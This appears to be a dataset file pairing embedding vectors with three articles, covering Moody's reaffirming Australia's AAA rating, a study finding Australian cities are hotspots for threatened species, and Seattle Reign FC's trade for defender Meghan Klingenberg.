[ -0.10787571966648102, 0.022183343768119812, -0.020053669810295105, -0.031542181968688965, 0.06707165390253067, -0.03261173516511917, -0.07688447088003159, -0.05120902881026268, -0.09501815587282181, -0.030473046004772186, -0.03450388461351395, 0.03734014183282852, -0.0015082499012351036, -0.10943881422281265, 0.0034971421118825674, -0.00384122459217906, 0.04875735566020012, -0.033243853598833084, 0.003186258254572749, 0.0030600244645029306, -0.05861276015639305, 0.01609218306839466, 0.048181045800447464, 0.05398908630013466, 0.09978198260068893, 0.024470658972859383, 0.001438124687410891, 0.03913823887705803, -0.004485322628170252, -0.03857451304793358, 0.03081728145480156, 0.055288590490818024, 0.060042206197977066, -0.08648750931024551, 0.12996350228786469, -0.014664677903056145, 0.013246459886431694, -0.007343252655118704, 0.03522735834121704, -0.006099646911025047, 0.11059132218360901, 0.03367534652352333, 0.014997292309999466, 0.05202538147568703, -0.1053474172949791, 0.0019980885554105043, 0.030270041897892952, -0.02016829326748848, 0.03573077544569969, 0.023580238223075867, 0.016759607940912247, 0.010193430818617344, 0.052867114543914795, 0.03992503881454468, -0.02453228272497654, -0.02195342816412449, 0.06355302780866623, 0.059066955000162125, -0.004850754979997873, 0.02465696632862091, -0.020558256655931473, -0.034689489752054214, -0.09350722283124924, -0.05853411927819252, 0.04276208579540253, -0.05701206624507904, -0.0007486195536330342, 0.1139056533575058, 0.08535251021385193, -0.118453249335289, 0.0010399651946499944, 0.01543736457824707, -0.02833918109536171, 0.12113036215305328, 0.014524158090353012, 0.024104245007038116, 0.03040599264204502, 0.006426023785024881, -0.01658027060329914, -0.012575235217809677, -0.01831839792430401, -0.09420149773359299, -0.001176447025500238, -0.04035588726401329, -0.09927012771368027, 0.0170030165463686, 0.06463194638490677, 0.08495151251554489, -0.02973061427474022, -0.03847606107592583, -0.033845726400613785, 0.09370123594999313, 0.09453043341636658, 0.02089834213256836, 0.025756660848855972, 0.04578776657581329, -0.032594628632068634, -0.07445480674505234, -0.04284492880105972, 0.0586727038025856, 0.03618964925408363, 0.038367871195077896, 0.05270346999168396, -0.12716856598854065, 0.018267517909407616, -0.10428290069103241, 0.046246789395809174, 0.152303546667099, 0.011768975295126438, 0.0015408447943627834, -0.03572160005569458, -0.03563418611884117, 0.05089184641838074, -0.0032610672060400248, 0.0683823749423027, 0.10581761598587036, -0.06502429395914078, 0.025829767808318138, -0.001815333147533238, -0.046546731144189835, 0.0386802963912487, -0.0636758804321289, -0.019962476566433907, -0.040722575038671494, -0.011628575623035431, 0.027686866000294685, 0.03600337728857994, 2.9549812089840828e-33, 0.005469934083521366, 0.029080988839268684, -0.040932346135377884, -0.007001588586717844, 0.040478140115737915, -0.015058965422213078, -0.0164955947548151, 0.07837837934494019, -0.01742548495531082, 0.0030456092208623886, 0.004126500338315964, -0.02460654079914093, -0.08162403851747513, 0.0553191713988781, -0.06404893100261688, -0.09766416251659393, -0.024983180686831474, 0.05680746212601662, 0.017563166096806526, 0.02432694472372532, 0.018747955560684204, -0.03199618682265282, -0.0840156078338623, 0.02025068923830986, -0.028928596526384354, -0.01591610163450241, 0.015651870518922806, -0.05515105277299881, 0.1025112196803093, 0.00582972913980484, -0.0128483846783638, 0.02661217376589775, 0.03906194120645523, -0.058945897966623306, -0.04445558041334152, -0.005589295644313097, -0.09454283863306046, -0.031164228916168213, -0.07223614305257797, -0.058742791414260864, 0.043668925762176514, 0.03090774081647396, 0.039841488003730774, 0.019963622093200684, -0.022150559350848198, -0.04640711843967438, 0.025841286405920982, -0.06105029582977295, -0.009118239395320415, 0.04307295382022858, 0.07204966992139816, 0.02529665268957615, -0.038602136075496674, 0.07943522930145264, -0.03748061880469322, 0.039041582494974136, 0.09081320464611053, -0.027760744094848633, 0.08404263854026794, 0.010691623203456402, 0.084758460521698, 0.03478982299566269, 0.0141228549182415, -0.015897631645202637, 0.04915676638484001, -0.06386076658964157, 0.0781368762254715, -0.00753274979069829, 0.05868784710764885, 0.08068211376667023, -0.01172270905226469, -0.08513075858354568, -0.021798331290483475, -0.08611490577459335, -0.0064605651423335075, -0.04923252388834953, -0.0200787466019392, 0.027443403378129005, -0.08277442306280136, -0.00014180313155520707, -0.01604408212006092, -0.0018200436607003212, 0.0007031551213003695, -0.03588492423295975, 0.05582597851753235, 0.027711473405361176, 0.0463496558368206, 0.0032963997218757868, -0.026653489097952843, 0.07260579615831375, -0.05352223664522171, 0.01220982801169157, 0.020691730082035065, 0.006784762721508741, -0.025216378271579742, -2.3134806972907513e-33, -0.0734277218580246, -0.010107945650815964, -0.014714878052473068, -0.05586213991045952, 0.04064013063907623, 0.00830701645463705, 0.0034222633112221956, 0.05734524875879288, -0.007848448120057583, -0.01649591512978077, -0.05813668668270111, -0.02402481436729431, 0.04832915589213371, -0.044256679713726044, -0.03978148102760315, -0.0916932076215744, 0.04263117164373398, -0.026532167568802834, 0.04742461070418358, 0.04010266438126564, -0.06157258152961731, 0.021405231207609177, 0.0371301993727684, 0.0404304638504982, 0.002611245261505246, 0.004874585662037134, 0.031062163412570953, 0.08631215989589691, 0.035282839089632034, 0.02592296712100506, -0.01491522416472435, -0.058156564831733704, -0.11533371359109879, -0.03630111366510391, 0.0024946099147200584, 0.0023592517245560884, 0.08884716033935547, 0.1079089343547821, -0.08561913669109344, -0.038680046796798706, -0.03667652606964111, 0.033734530210494995, -0.05213414132595062, -0.034164104610681534, -0.00340171717107296, -0.03956207260489464, -0.045942630618810654, 0.010076642967760563, -0.04013751447200775, 0.08404042571783066, 0.07172509282827377, 0.011697078123688698, 0.04672344774007797, -0.04038981348276138, 0.06182298809289932, -0.05236808955669403, -0.011041712947189808, 0.05085672065615654, -0.0041071828454732895, 0.11313509196043015, -0.03235073760151863, 0.01582728512585163, -0.039275284856557846, -0.06777933984994888, -0.029879923909902573, 0.03687739372253418, 0.07795565575361252, 0.0012826317688450217, 0.020003460347652435, 0.1147255226969719, 0.025700440630316734, 0.07068157941102982, 0.034589920192956924, 0.02402351424098015, -0.00709235155954957, 0.05972355604171753, -0.0038028506096452475, 0.07104159891605377, -0.03639081120491028, -0.09185092151165009, -0.008193617686629295, 0.07087212055921555, -0.026895837858319283, -0.02554159238934517, 0.05606703460216522, -0.07028436660766602, 0.024921545758843422, -0.04095891863107681, 0.02905905991792679, -0.000017054821000783704, 0.009349583648145199, 0.0357864685356617, -0.02328765019774437, 0.04295666888356209, 0.04372435808181763, -5.968360738961564e-8, 0.06059231609106064, 0.029781697317957878, 0.05320623889565468, -0.005467251408845186, 0.04053410142660141, 0.01676909439265728, -0.011462586931884289, -0.0326797291636467, 0.008717590011656284, -0.05792892351746559, 0.05260225385427475, -0.11337672173976898, -0.03785933181643486, -0.011592634953558445, -0.02835761196911335, -0.08152106404304504, -0.03714808076620102, 0.04852348938584328, -0.06200201064348221, -0.01262771524488926, -0.019149255007505417, 0.01814188063144684, 0.028485260903835297, -0.03088601678609848, 0.061628781259059906, -0.04152173548936844, 0.10659448057413101, 0.0012757314834743738, 0.023832689970731735, -0.04419554024934769, 0.03969729691743851, -0.015308931469917297, -0.09294857084751129, -0.03454693406820297, 0.020980294793844223, -0.03633534163236618, -0.1056198924779892, -0.04020717367529869, 0.006054541561752558, 0.01803899183869362, 0.0064279455691576, -0.01576215960085392, -0.021509410813450813, -0.06749073415994644, 0.011733810417354107, -0.1133551076054573, 0.031530607491731644, -0.09348893910646439, 0.02063070237636566, 0.03431028872728348, -0.02729564718902111, -0.07030097395181656, 0.007505816873162985, -0.03146076947450638, 0.13108953833580017, 0.05883435904979706, -0.020391982048749924, 0.023685459047555923, -0.004985718987882137, 0.07660240679979324, 0.03916877508163452, 0.0037612146697938442, -0.0039892238564789295, 0.06336904317140579 ]
Moody's affirms Australia's AAA rating Updated Moody's credit rating agency has reaffirmed Australia's AAA sovereign debt rating. Moody's says the rating is based on very high economic resiliency, very high Government financial strength and low susceptibility to risk. The Australian Government has very low gross debt that is easily affordable, compared to most other nations with that rating, it says. "As one of the world's most advanced economies, the country has not only a significant natural resource sector - including minerals, hydrocarbons, and agriculture - but also well developed manufacturing and service sectors," the report said. "It also demonstrates strong governance indicators. In particular, the framework for fiscal policy is transparent and has, until now, consistently kept government debt at low levels." Acting Prime Minister Wayne Swan says it is another resounding endorsement of Australia's sturdy public finances and strong economic fundamentals. "Once again, this shows that people like Mr Abbott and Mr Hockey who continually talk Australia’s economy down are wrong," Mr Swan said. "Despite the substantial global headwinds that are hitting our economy, Australians have reason to be confident about our economic strengths that are unmatched by just about any other developed economy. "We have a solidly growing economy, low unemployment, contained inflation, strong public finances and a record pipeline of investment that is gathering pace." The report does note that Australia will have to implement policies to deal with its ageing population. Last month, Fitch Ratings upgraded its assessment of Australia's sovereign debt to AAA, making it the first time Australia has attained the top rating from all three international agencies. Topics: business-economics-and-finance, economic-trends, markets, australia First posted
[ 0.0035739531740546227, -0.04931419715285301, -0.05543851852416992, 0.07670123875141144, 0.039342645555734634, 0.054235510528087616, 0.05362696945667267, 0.016867725178599358, -0.023816287517547607, 0.05349424108862877, -0.05400451645255089, 0.013143874704837799, -0.043318990617990494, 0.014087175950407982, 0.0107312286272645, -0.005529053509235382, 0.007953385822474957, -0.11004743725061417, -0.033470530062913895, 0.05422099307179451, 0.04931757599115372, 0.09948240220546722, 0.0025260380934923887, -0.003946337383240461, 0.03305488079786301, 0.05067259818315506, -0.04945318400859833, 0.014411737211048603, -0.03477110341191292, -0.0014886081917211413, -0.0276046060025692, 0.054973214864730835, 0.01890128292143345, 0.004200178664177656, 0.07387864589691162, 0.08261267840862274, 0.04558814689517021, -0.023404303938150406, 0.005344111006706953, -0.05514606460928917, 0.08998574316501617, 0.03211832419037819, 0.023885885253548622, -0.03218977153301239, -0.03933874890208244, -0.017891939729452133, 0.11136528849601746, -0.04635543003678322, -0.053033601492643356, 0.04475298151373863, -0.04116806015372276, 0.0035333114210516214, 0.07388212531805038, -0.08709895610809326, 0.05291535705327988, 0.04524931684136391, 0.019632913172245026, -0.054947733879089355, -0.04144950211048126, -0.08678503334522247, -0.04486533999443054, -0.026302078738808632, 0.0060552447102963924, -0.012558926828205585, 0.11872012168169022, 0.028016990050673485, -0.12173131108283997, -0.002967873588204384, -0.09008318930864334, -0.0031320720445364714, -0.05198874697089195, -0.11186709254980087, 0.01276826485991478, 0.004506281111389399, -0.029464799910783768, -0.05746614560484886, 0.06695779412984848, 0.04587794095277786, 0.029386602342128754, 0.04369588568806648, 0.05156731978058815, -0.042716726660728455, 0.021044224500656128, -0.06031732261180878, -0.025171509012579918, -0.09307128190994263, 0.11652255803346634, -0.07650429010391235, 0.00685720331966877, 0.035386648029088974, 0.03166814520955086, 0.03186008334159851, 0.1162543073296547, 0.04543263837695122, 0.047447700053453445, 0.07635196298360825, -0.027329249307513237, -0.0959344208240509, -0.06658770889043808, 0.05217397212982178, 0.06295546144247055, 0.06939901411533356, 0.042488280683755875, 0.053995221853256226, -0.0267000962048769, 0.02705979160964489, 0.0020783510990440845, 0.018144087865948677, 0.01920505426824093, -0.0013090729480609298, 0.003037691116333008, 0.031843431293964386, -0.006116589996963739, -0.020649684593081474, 0.003005128586664796, -0.07173825055360794, 0.0019346181070432067, 0.01898273080587387, 0.011393828317523003, 0.02662532590329647, 0.0692146047949791, -0.06830340623855591, 0.029851410537958145, -0.009465761482715607, 0.10803085565567017, 0.10804446786642075, -0.06962179392576218, 1.2630385579158081e-33, 0.04461780935525894, 0.02854793891310692, 0.07611070573329926, -0.041844990104436874, -0.06329276412725449, 0.0025946074165403843, -0.04366476461291313, -0.020016591995954514, -0.014858968555927277, 0.05243502929806709, 0.00217546708881855, 0.08738166093826294, 0.017313461750745773, 0.04760047048330307, 0.002101846970617771, 0.0011114280205219984, -0.028489697724580765, 0.022055383771657944, 0.07539208233356476, 0.06953291594982147, 0.00008575449464842677, -0.009945986792445183, 0.07642864435911179, -0.09142469614744186, 0.031004110351204872, -0.030561868101358414, 0.10215490311384201, -0.025804875418543816, 0.0376024954020977, 0.005133552011102438, 0.03775622695684433, 0.0628281682729721, -0.010526121594011784, -0.05773358419537544, -0.07539630681276321, -0.019478775560855865, -0.048227835446596146, 0.037427183240652084, 0.017687855288386345, -0.02139195427298546, -0.014370373450219631, -0.024636443704366684, 0.006632831878960133, 0.053681761026382446, 0.028207266703248024, -0.02963942289352417, -0.003141716355457902, -0.02318846434354782, -0.09418615698814392, 0.10868842154741287, 0.03459122031927109, -0.022242164239287376, -0.038282882422208786, 0.006644686684012413, -0.036626771092414856, -0.03013325110077858, -0.047750335186719894, -0.021650904789566994, -0.03533397242426872, -0.09561571478843689, -0.0010285048047080636, -0.11113741248846054, -0.09623958170413971, -0.05522141233086586, -0.010917975567281246, 0.09763390570878983, 0.04102528467774391, 0.0452982597053051, -0.0555262416601181, 0.03794243559241295, -0.02726433053612709, -0.04616284742951393, 0.025819282978773117, 0.028986185789108276, -0.00003539512908901088, 0.034056976437568665, 0.0245535746216774, 0.01862996444106102, -0.002938385820016265, -0.036791492253541946, -0.07589174807071686, 0.024378694593906403, 0.023476598784327507, -0.07024036347866058, -0.017646795138716698, -0.017867114394903183, -0.039517469704151154, -0.026680169627070427, 0.08158638328313828, -0.03945867717266083, -0.05060439184308052, -0.05120664834976196, 0.051592592149972916, 0.05323401093482971, -0.06836819648742676, -2.8575656044085397e-33, -0.0027898927219212055, -0.06321742385625839, -0.08548025786876678, 0.026822123676538467, -0.018017131835222244, -0.08893028646707535, -0.004376713652163744, 0.001300197560340166, -0.027238549664616585, -0.054831717163324356, -0.007843081839382648, 0.10338310152292252, -0.010800902731716633, 0.03957374021410942, 0.04016551002860069, 0.0030772583559155464, 0.00893147848546505, 0.013971898704767227, 0.048575762659311295, -0.10728678107261658, 0.07590872049331665, 0.03893718868494034, 0.005295365583151579, 0.07460110634565353, -0.06048848107457161, 0.024792516604065895, -0.0812571719288826, -0.10182793438434601, 0.026118405163288116, -0.04612293466925621, -0.023234011605381966, 0.0997411236166954, -0.017534928396344185, 0.011279372498393059, -0.10359969735145569, 0.007860970683395863, -0.06850449740886688, -0.14474017918109894, -0.06380485743284225, 0.1397855579853058, 0.018080836161971092, 0.0503409318625927, -0.04327234998345375, -0.07479459047317505, -0.03837544471025467, -0.040590133517980576, 0.005461015272885561, 0.028860921040177345, 0.008147035725414753, 0.046760912984609604, 0.03020455315709114, 0.01157337985932827, -0.06338091194629669, 0.022397028282284737, -0.050485484302043915, 0.0016559173818677664, 0.07506181299686432, 0.011618695221841335, -0.03602966293692589, 0.033068642020225525, -0.019919833168387413, 0.11041565239429474, -0.021140336990356445, -0.018321959301829338, 0.03699079900979996, -0.045843325555324554, 0.009920075535774231, -0.08238641172647476, 0.0632925033569336, 0.022625500336289406, 0.007092595100402832, -0.04477405548095703, -0.031702350825071335, 0.027484029531478882, 0.05622895434498787, 0.14096306264400482, 0.022173911333084106, -0.03371488302946091, 0.009322267957031727, 0.017860036343336105, 0.030980726704001427, 0.013486559502780437, 0.019990863278508186, 0.002818044275045395, -0.049864500761032104, 0.003649431047961116, 0.04966793209314346, -0.08426399528980255, -0.012522137723863125, 0.05167846381664276, -0.07786204665899277, -0.045545220375061035, 0.010174107737839222, 0.038228169083595276, -0.012241228483617306, -4.9336712493186496e-8, -0.014468501321971416, -0.006837957538664341, -0.07545148581266403, 0.009582208469510078, -0.06293495744466782, -0.0006439669523388147, 0.005217257887125015, 0.027260486036539078, 0.06210800260305405, -0.023893438279628754, 0.10142552852630615, -0.025708550587296486, -0.048054832965135574, -0.03913026675581932, 0.015373078174889088, 0.03954621031880379, -0.08335409313440323, 0.04159931838512421, -0.05033249780535698, -0.035335883498191833, 0.001762131112627685, 0.04285522550344467, -0.04815308377146721, 0.04419826343655586, 0.022200578823685646, -0.06742776185274124, 0.009253169409930706, 0.03717030584812164, -0.057266443967819214, 0.046266619116067886, -0.03658980503678322, 0.04180165380239487, 0.029899125918745995, -0.015635916963219643, -0.059425584971904755, 0.0022089965641498566, 0.10781120508909225, -0.03177421912550926, 0.05289483070373535, 0.00918734259903431, -0.014826997183263302, -0.043988097459077835, -0.07009318470954895, -0.024714047089219093, -0.03151925280690193, -0.03451259434223175, 0.003952687606215477, 0.011195664294064045, 0.009596319869160652, -0.0823339968919754, -0.029006727039813995, 0.025026673451066017, -0.04308965429663658, 0.010931728407740593, -0.048281505703926086, -0.012492870911955833, -0.0823950469493866, 0.007043216377496719, -0.058897536247968674, -0.01986188441514969, 0.06689572334289551, -0.10533598065376282, 0.03803020715713501, -0.018487242981791496 ]
The average Australian city is home to 32 threatened species, according to a study recently published in the journal Global Ecology and Biogeography. “The finding was surprising because we generally write off cities as ‘lost causes’ when it comes to conservation,” says Pia Lentini, a research fellow at the University of Melbourne’s School of Biosciences and a member of the study team. “We tend to imagine that threatened species are only found in far away national parks or remote areas.” Not so, Lentini and her colleagues found. In fact their study, the first continent-scale analysis of threatened species and cities, suggests that urban areas are disproportionately rich in threatened species compared to non-urban areas. The researchers compiled data on the distribution of Australia’s 1,643 land-dwelling threatened species, including 1,215 plants and 428 animals. They compared these maps to the locations of Australia’s 99 cities that have more than 10,000 residents. They found that 503 threatened species, or 30 percent of the total, have distributions that overlap with urban areas. This includes 25 percent of listed plants and 46 percent of listed animals – species like the koala, grey-headed flying fox, swift parrot, Carnaby’s black cockatoo, green and gold bell frog, and lots of orchids. Some species are heavily dependent on urban habitat, in fact. For 51 of the species, at least 30 percent of their range falls within urban areas. And eight threatened species, all plants, are entirely confined to cities. For example, the Nielsen Park she-oak is found only within metropolitan Sydney, and the fringed spider-orchid only in a rapidly developing part of Melbourne. Each Australian city contains a different suite of threatened species. About half of the species, or 258, are found in only one city each. But all 99 of the cities are known or likely to be home to at least one threatened animal, and 88 of them are known or likely to harbor threatened plants. Sydney contains the most threatened species, with 124 found there. Even more striking, the researchers found that acre for acre, urban areas contain more threatened species than do non-urban areas, leading them to dub cities “hotspots” for threatened species. As an extra test of this finding, the researchers also created “dummy” cities equivalent in area and in the same bioregion as each of the 99 real cities. True cities contain more threatened species than dummy cities, they found. In some ways this is no surprise. Cities tend to be located in areas of high biodiversity, because humans just like other living things know a promising patch of habitat when they see one. And once urbanization gets going, of course, it tends to put the squeeze on wild plants and animals. But the findings also suggest that with a little more care and consideration cities could make a major contribution to conservation. Urban areas commonly contain patches of native habitat interspersed with development, after all. Moreover, landscapes planted and maintained by humans can help certain species through lean times of the year. Even so, policymakers often consider urban habitat degraded and insignificant, the researchers note, and therefore permit development that further erodes habitat for threatened species, bit by little bit. So the assumption that cities don’t matter not only means missed opportunities for conservation, but paradoxically, could itself be a threat to endangered species survival. – Sarah DeWeerdt | January 5, 2016 Source: Ives C.D. et al. “Cities are hotspots for threatened species.” Global Ecology and Biogeography DOI: 10.1111/geb.12404 Header image: Carnaby’s black cockatoo (Calyptorhynchus latirostris), photographed in a suburb of Perth, Australia. The endangered bird relies on an introduced pine plantation in Perth for food. Credit: Ralph Green via Flickr.
[ 0.1412685215473175, 0.0023232062812894583, 0.05215654894709587, 0.0806834027171135, 0.06649637222290039, 0.09913865476846695, -0.07479036599397659, -0.044682666659355164, 0.013235743157565594, 0.11024701595306396, 0.03742004558444023, -0.13822676241397858, -0.015114271081984043, 0.09157358855009079, 0.007590135093778372, 0.030678214505314827, -0.01850939728319645, -0.06177344173192978, -0.029698586091399193, 0.030295465141534805, 0.008932795375585556, 0.09312424063682556, 0.05357571318745613, 0.0340455137193203, -0.06455157697200775, -0.020101947709918022, -0.04705193638801575, 0.07472221553325653, -0.010010888800024986, -0.008749449625611305, -0.030797692015767097, 0.1049962267279625, 0.011968222446739674, -0.024305814877152443, 0.02650514617562294, -0.020087655633687973, 0.002187911653891206, -0.0007713325321674347, 0.07430668920278549, 0.023962968960404396, 0.04958866909146309, 0.036083582788705826, 0.08310972154140472, -0.04521089047193527, -0.12089555710554123, -0.03297369182109833, -0.060937728732824326, 0.01256583258509636, 0.016350703313946724, -0.07322240620851517, 0.008376399986445904, 0.036181412637233734, 0.009250904433429241, -0.046005867421627045, -0.04372880980372429, -0.08844365924596786, -0.006124858744442463, -0.08787154406309128, -0.0014046650612726808, -0.09047567844390869, 0.10847300291061401, 0.0005241556209512055, -0.008366563357412815, -0.0038861269131302834, 0.007603498641401529, 0.021160563454031944, -0.18581734597682953, 0.0042365058325231075, 0.06989244371652603, -0.03315117955207825, 0.03042362444102764, -0.07458268851041794, -0.01905352622270584, 0.06596402823925018, 0.015894293785095215, -0.011043578386306763, 0.03684607893228531, 0.042957693338394165, 0.05555247142910957, -0.011362762190401554, 0.07536628842353821, 0.004533105995506048, 0.013191248290240765, -0.01833289861679077, 0.027082903310656548, -0.020293356850743294, 0.06959794461727142, 0.025828151032328606, -0.02917342260479927, 0.009029427543282509, 0.011067261919379234, 0.0087629035115242, 0.09027516841888428, -0.011789882555603981, 0.00536007946357131, -0.0040986742824316025, -0.006472683511674404, -0.11753180623054504, -0.03172583505511284, -0.0037716643419116735, 0.03254058212041855, -0.0824853926897049, 0.062386516481637955, -0.0208785068243742, -0.02050148695707321, -0.09275493770837784, -0.08160001039505005, -0.08277178555727005, -0.012944485992193222, 0.07516700029373169, -0.0016523470403626561, 0.03114187903702259, -0.07543154060840607, 0.10780882090330124, 0.010878585278987885, -0.01988060586154461, 0.058420851826667786, -0.020248984917998314, 0.0023637248668819666, -0.01897931471467018, 0.032857801765203476, -0.06240097060799599, 0.03503284603357315, -0.03577406331896782, 0.09582480788230896, 0.019621726125478745, -0.11599215120077133, 1.3299218905901923e-33, 0.050479769706726074, -0.0850910022854805, 0.02956051006913185, -0.0044219898991286755, 0.02975567616522312, -0.1285591572523117, -0.031414300203323364, -0.036456845700740814, -0.027953220531344414, -0.003093119477853179, -0.01285400427877903, 0.03899933397769928, 0.10627510398626328, 0.040965914726257324, 0.02851070649921894, 0.034083135426044464, 0.08615923672914505, 0.016909237951040268, -0.01892569661140442, -0.02163751982152462, -0.03938063979148865, 0.0033947834745049477, 0.04062921553850174, 0.04201681539416313, -0.027230268344283104, -0.0435614250600338, 0.001239886856637895, -0.0688340812921524, -0.030387669801712036, -0.005337744951248169, 0.0045272004790604115, 0.005043546669185162, -0.016980763524770737, -0.0028269621543586254, 0.026239663362503052, 0.014535080641508102, 0.01885463297367096, -0.06714688241481781, 0.012733470648527145, 0.029119325801730156, -0.04775337874889374, -0.00041812536073848605, 0.03601975739002228, -0.0022981087677180767, 0.13090968132019043, -0.03254932910203934, -0.018287384882569313, -0.037051618099212646, -0.03644493967294693, 0.05088231340050697, -0.016643375158309937, -0.008814570493996143, -0.005747627466917038, 0.05494343861937523, -0.007702105678617954, 0.025035647675395012, -0.023233680054545403, 0.010058099403977394, 0.04733056202530861, 0.020004965364933014, -0.026858963072299957, -0.003233988769352436, -0.002812679624184966, -0.07865742594003677, 0.16590826213359833, -0.039936941117048264, 0.08083191514015198, 0.02525748685002327, -0.08045848459005356, 0.10602264851331711, 0.01145905815064907, -0.025544214993715286, -0.03547701612114906, -0.05121669918298721, -0.01304476149380207, -0.019392896443605423, 0.05717676505446434, 0.020510882139205933, -0.017470046877861023, 0.02934001013636589, -0.0012945469934493303, 0.07162351161241531, -0.05485863611102104, -0.0203349981456995, -0.0031883609481155872, -0.04083586111664772, 0.03755280375480652, -0.024432849138975143, 0.05452357605099678, -0.07849983125925064, 0.0425017848610878, -0.00721887918189168, -0.007969612255692482, -0.06380663067102432, -0.04312807694077492, -1.698207668616173e-33, -0.08402913063764572, -0.06068219989538193, -0.0060418094508349895, 0.014564277604222298, -0.12985454499721527, -0.06783629208803177, -0.023548150435090065, 0.010468602180480957, 0.02606639266014099, -0.08744502812623978, -0.11267640441656113, 0.11249541491270065, 0.12269478291273117, -0.0314994752407074, 0.029352854937314987, -0.013645699247717857, 0.057431504130363464, 0.007701531983911991, 0.001974788960069418, -0.07829249650239944, -0.03726105019450188, -0.06654079258441925, -0.03264426067471504, -0.007158549502491951, -0.07344947755336761, 0.04479031264781952, -0.05294553562998772, -0.04388527199625969, -0.01216754037886858, -0.108438640832901, 0.003463303204625845, 0.028149841353297234, -0.02507416158914566, 0.032475512474775314, -0.08156035095453262, 0.030657414346933365, 0.04907577857375145, -0.06426263600587845, -0.003231757553294301, 0.06685388833284378, -0.05950525030493736, 0.04379047080874443, -0.005154123064130545, -0.08423357456922531, -0.015650691464543343, 0.011660503223538399, -0.010053054429590702, 0.011032087728381157, -0.04397326335310936, 0.028436429798603058, 0.0726609155535698, 0.04832601174712181, -0.05675364285707474, 0.0008609180222265422, 0.006523657124489546, -0.029501307755708694, 0.06371233612298965, 0.029606429859995842, -0.003691617399454117, 0.04029752314090729, 0.013193324208259583, 0.07900656014680862, -0.03598489612340927, 0.058381982147693634, -0.02805817499756813, -0.04624089226126671, -0.007563089951872826, -0.011709841899573803, 0.005961140617728233, -0.02381867729127407, -0.04395366832613945, 0.08737795799970627, -0.015004266053438187, -0.06270447373390198, 0.011769041419029236, 0.07253412157297134, 0.04923221096396446, 0.015111101791262627, 0.061635568737983704, 0.060732655227184296, 0.05377235263586044, 0.00796791072934866, 0.0003511111717671156, -0.029272032901644707, 0.0324939601123333, 0.05510454997420311, -0.02449030801653862, -0.038263432681560516, 0.0646122470498085, 0.08883433789014816, -0.0563092976808548, -0.030934801325201988, -0.04744206741452217, -0.001997348852455616, 0.030222875997424126, -4.725723812271099e-8, 0.018839150667190552, 0.09307903796434402, -0.02430856041610241, -0.0097289914265275, -0.007760595064610243, 0.018508097156882286, 0.00529576325789094, -0.003544260747730732, 0.05183442309498787, 0.0729740783572197, 0.05402655154466629, -0.056375131011009216, -0.00974728912115097, 0.03180978447198868, 0.033622488379478455, -0.012156600132584572, 0.06575225293636322, -0.0348224863409996, -0.035498637706041336, 0.0717945247888565, -0.02935952879488468, 0.03757369518280029, -0.09000565111637115, -0.04249655827879906, 0.05876975134015083, -0.09021687507629395, -0.06060744449496269, -0.017690859735012054, -0.017352791503071785, 0.021254995837807655, -0.04215095564723015, -0.02025914192199707, -0.029593810439109802, 0.03432410955429077, 0.059584759175777435, -0.01677212119102478, 0.03412569314241409, -0.006761328782886267, 0.011379815638065338, -0.024843748658895493, 0.047205518931150436, -0.06343351304531097, -0.02440875582396984, 0.025549020618200302, -0.00884318258613348, -0.0008767532417550683, -0.00782371312379837, -0.014842800796031952, 0.029031943529844284, -0.08264749497175217, -0.06454063206911087, 0.00015538898878730834, -0.009749880991876125, 0.03574283793568611, -0.030567629262804985, -0.03152940049767494, -0.024814045056700706, -0.06101036071777344, 0.06585561484098434, -0.01505997497588396, 0.017759403213858604, -0.05237261578440666, -0.06308234483003616, 0.0707317590713501 ]
SEATTLE, WA — (club release) – Seattle Reign FC announced today that the club has acquired U.S. Women’s National Team (USWNT) defender Meghan Klingenberg from the Houston Dash. In exchange, Reign FC traded the rights to midfielder Amber Brooks and the 5th pick in the first round of the 2016 NWSL College Draft to Houston. In addition to Klingenberg, Seattle will also receive a conditional selection in the 2017 NWSL College Draft. (Cover photo: Fox Soccer / Youtube) ——————– Editor’s Note: But is she staying? Equalizer soccer says that Klingenberg is actually on her way to Portland Thorns via Seattle, as part of a complex ripple effect from the recent deal that sent Alex Morgan to the expansion Orlando Pride. Read more about that here. ——————– Klingenberg, 27, was selected by the Houston Dash in the 2014 Expansion Draft from the Boston Breakers. Through two seasons with the Dash, the Gibsonia, Pa. native appeared in 19 matches (all starts), tallying two assists in 1,653 minutes. Prior to joining the NWSL, Klingenberg spent two seasons with Swedish club Tyresö FF and also played with the Boston Breakers (WPS), and magicJack (WPS). The defender played all four years of her college career at the University of North Carolina at Chapel Hill, scoring 19 goals and tallying 24 assists. During that time, Klingenberg lead the Tar Heels to two NCAA National Championships. Klingenberg has amassed 45 caps with the USWNT, scoring three goals. In the 2015 FIFA Women’s World Cup, Klingenberg played every minute of every USWNT match, in a backline that delivered a shutout streak lasting 540 minutes en route to being crowned World Champions. Klingenberg had a standout performance against Sweden during group play of the World Cup, clearing a shot off the line to preserve the USA’s 0-0 draw. Brooks, 24, was acquired by Seattle from the Western New York Flash in March of 2015 in a trade that sent USWNT forward Sydney Leroux and defender Amanda Frisbie to Rochester. As part of the trade, Reign FC also received the 4th pick in the 2016 College Draft and the rights to USWNT forward Abby Wambach. Brooks tallied one goal in 12 matches (4 starts) for Seattle during its 2015 NWSL Shield-winning season.
[ -0.04407285526394844, -0.01589621603488922, -0.019999651238322258, 0.000758869166020304, -0.01952386647462845, 0.07211273908615112, -0.002431808039546013, -0.036944594234228134, 0.04656848683953285, 0.034464284777641296, -0.016971850767731667, -0.08392535150051117, 0.02273511327803135, 0.04591852053999901, 0.03513810783624649, 0.035189203917980194, -0.019437318667769432, -0.016316978260874748, -0.04995587468147278, 0.06388961523771286, -0.07566703110933304, -0.09905697405338287, -0.07552821189165115, 0.001224322128109634, 0.08090107142925262, 0.0204312726855278, -0.0006392564973793924, 0.0318496935069561, -0.02338923141360283, -0.02037067525088787, -0.020266199484467506, -0.0010865915101021528, -0.032997701317071915, 0.06078680232167244, -0.0008717423188500106, 0.04612564668059349, -0.020473340526223183, -0.05182875320315361, 0.056581757962703705, 0.06279056519269943, 0.022347459569573402, -0.052240725606679916, -0.04240793734788895, 0.05164482444524765, -0.10417185723781586, -0.03551848232746124, -0.026803459972143173, 0.010073875077068806, -0.0389656163752079, -0.005062703974545002, 0.0036278346087783575, -0.0707743912935257, 0.04148397594690323, 0.03421600162982941, 0.060475368052721024, 0.0552053228020668, -0.05629488080739975, 0.047258079051971436, 0.05038341507315636, -0.0808292031288147, 0.057705357670784, -0.06507520377635956, 0.010520361363887787, 0.018792659044265747, -0.11616963893175125, -0.06647153943777084, -0.05034314841032028, -0.015469229780137539, 0.01590476557612419, -0.06946089118719101, 0.07547648996114731, 0.02663859911262989, -0.06242396682500839, 